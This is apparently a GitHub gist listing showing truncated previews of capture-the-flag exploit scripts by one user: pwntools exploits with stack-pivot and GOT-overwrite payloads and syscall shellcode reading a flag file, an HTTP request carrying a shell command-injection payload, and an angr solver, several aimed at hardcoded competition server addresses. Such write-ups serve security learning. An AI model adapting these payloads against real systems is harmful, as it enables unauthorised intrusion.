salls
/ exploit_grunt.py
Created
December 29, 2016 22:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #33C3_4cab52949778211296ac800d072f9032 | |
| #r = process("./grunt") | |
| r = remote("78.46.224.90", 1337) | |
| # names "Lukachu", "Hannobat", "Andyball", "Airmackly" | |
| # idea is that we call fight Airmackly from inside fight to make num_attacks = -1 or 255 | |
| # then we can find a useful pointer (e.g. name of a pokemon afterwards and change it) |
salls
/ almost_wtf.sh
Last active
September 18, 2016 22:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /login.wtf HTTP/1.1 | |
| Content-type: text/plain | |
| Content-Length: 30 page_include_depth | |
| a[$(get_flag2>gotem)] |
salls
/ amadhj_solve.py
Created
June 6, 2016 03:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import simuvex, angr | |
| proj = angr.Project("./amadhj") | |
| s = proj.factory.blank_state(addr=0x4026D1) | |
| ans = s.se.BVS("ans",32*8) | |
| s.memory.store(0x1000,ans) | |
| s.regs.rdi = 0x1000 | |
| for i in range(32): | |
| b = ans.get_byte(i) | |
| in_range = s.se.And(b > "@", b < "z") | |
| const = s.se.Or(b == " ", in_range) |
salls
/ readable.py
Created
October 19, 2015 07:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process("./readable") | |
| r = remote("52.68.53.28", 56746) | |
| # pivot the stack to the GOT to overwrite target of __libc_start_main, then call start | |
| payload1 = "A"*0x10 + p64(0x600900) + p64(0x400505) | |
| r.send(payload1) | |
| raw_input("> ") | |
| payload2 = p64(0x400511) + "A"*8 + p64(0x600900) + p64(0x400416) |
salls
/ fireblossom.py
Last active
October 19, 2015 07:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #nc 52.69.206.114 10002 | |
| from pwn import * | |
| r = remote("52.69.206.114", 10002) | |
| # openat(-100, “flag”, 0, 0); sendfile(2,3,0,64) | |
| code = "mov rsi, rsp; mov rbx, 0x67616c66; mov [rsi], rbx; mov rdi, -100; xor r10, r10; xor rdx, rdx; mov rax, 257; syscall; " | |
| code += "mov rsi, rsp; mov [rsi], rax; mov rdi, 1; mov rdx, 0x8; mov rax, 1; syscall; " |